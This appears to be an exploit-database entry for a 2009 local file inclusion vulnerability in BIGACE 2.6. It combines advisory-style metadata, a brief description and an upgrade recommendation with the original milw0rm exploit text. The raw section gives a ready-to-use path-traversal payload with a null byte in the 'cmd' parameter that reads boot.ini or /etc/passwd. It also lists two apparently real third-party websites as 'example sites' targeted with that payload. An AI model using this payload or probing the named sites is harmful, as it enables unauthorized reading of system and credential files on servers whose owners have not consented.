LFI

vendor:

BIGACE

by:

CWD@rBe

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: BIGACE

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: N/A

CPE: a:bigace:bigace:2.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A vulnerability in BIGACE 2.6 allows an attacker to read arbitrary files on the server by using a Local File Inclusion (LFI) attack. This is done by sending a specially crafted HTTP request to the vulnerable server. The vulnerable parameter is the ‘cmd’ parameter in the ‘public/index.php’ script. By sending a request with a maliciously crafted ‘cmd’ parameter, an attacker can read arbitrary files on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of BIGACE.

Source

Exploit-DB raw data:

-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
  
Author     : CWD@rBe
 
Special Thanks : www.cyber-warrior.org
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************

# milw0rm.com [2009-06-30]